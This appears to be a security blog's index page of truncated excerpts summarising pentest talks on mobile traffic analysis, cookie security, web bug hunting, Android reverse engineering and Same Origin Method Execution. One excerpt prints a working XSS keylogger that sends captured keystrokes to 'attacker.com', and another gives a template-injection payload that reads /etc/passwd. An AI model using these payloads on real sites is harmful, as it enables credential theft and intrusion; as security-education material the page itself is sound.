Brida: Advanced Mobile Application Penetration Testing with Frida

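Watch on YouTube NIN: The talk is in Italian and mostly reads from the slides, with no demo; it can be skipped. Slide: PDF (Mirror) Difficulty levels when analyzing traffic: Level 1: No encryption at all. You do not even need to install a certificate. Level 2: HTTPS. Install the Burp certificate. Level 3: SSL + Certificate Pinning. This needs the help of tools such as SSL KillSwitch 2. Level 4: SSL + Certificate Pinning + POST data encrypted with AES. You need to know the encryption key. Level 5: SSL + Certificate Pinning…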

InfoCon

InfoCon Collection: Hacking Conference Audio and Video Archive…

Cookie Security Myths and Misconceptions - David Johansson - AppSecUSA 2017

Cookies are an integral part of any web application and secure management of cookies is essential to web security. However, during my years as a security consultant I've often encountered various myths and misconceptions regarding cookie security from both developers as well as other security professionals. This talk will dive…

XSS Keylogger

k.js keys = ""; document.onkeypress = function(e){ get = window.event? event:e; key = get.keyCode? get.KeyCode:get.charCode; key = String.fromCharCode(key); keys +=key; } setInterval(function(){ fetch('//attacker.com/k.php?k=' + keys); }, 1000); k.php <?php $k = $_GET["k"]; if(!empty(…

Hunting Security Bugs In Web Apps - Suleman Malik

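Watch on YouTube Slide Exploit 1 - Huawei: The endpoint for modifying account information requires no cookie, so an anonymous user can arbitrarily modify other users' information. Exploit 2 - Intel Angularjs: Angular evaluates {1+1} as 2; check whether Angular encodes input. The following payload prints the contents of /etc/passwd. {php}$s=file_get_contents('/etc/passwd');var_dump($s);{/php} Exploit 3 - CSRF: Even though there is a CSRF token, the request is still accepted when it is replayed with the token removed. Exploit 4…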

YouTube-DL

Usage Download through a proxy $ youtube-dl https://youtu.be/Kb56GzQ2pSk --proxy "socks5://127.0.0.1/" [youtube] Kb56GzQ2pSk: Downloading webpage [youtube] Kb56GzQ2pSk: Downloading video info webpage [youtube] Kb56GzQ2pSk: Extracting video information WARNING: unable to extract uploader nickname [youtube] Kb56GzQ2pSk: Downloading MPD manifest [download] Destination: Identity, Authentication + OAuth = OpenID Connect-Kb56GzQ2pSk.webm [download]…

Jon Reeve – Reverse Engineering is not just for hackers

Watch on YouTube Slides aapt // General APK info: $ aapt dump badging myapk.apk // Get strings $ aapt dump strings myapk.apk // Get xml file: $ aapt dump xmltree myapk.apk AndroidManifest.xml adb // List installed packages $ adb shell pm list packages -f -3 // pull package $1 in one line $ adb pull "…

Same Origin Method Execution

Finding Same Origin Method Execution Vulnerabilities | LinkedIn Security - Explains how the S.O.M.E. attack works step by step, from the basics to the details. If you are short on time, you can read just this article. Talk 1 - BH 2014 Watch on YouTube. BH Presentation Paper BurpSuite Plugin Talk 2 - 2017 Watch on YouTube Slide Ref Beyond XSS and CSRF: Same Origin Method Execution…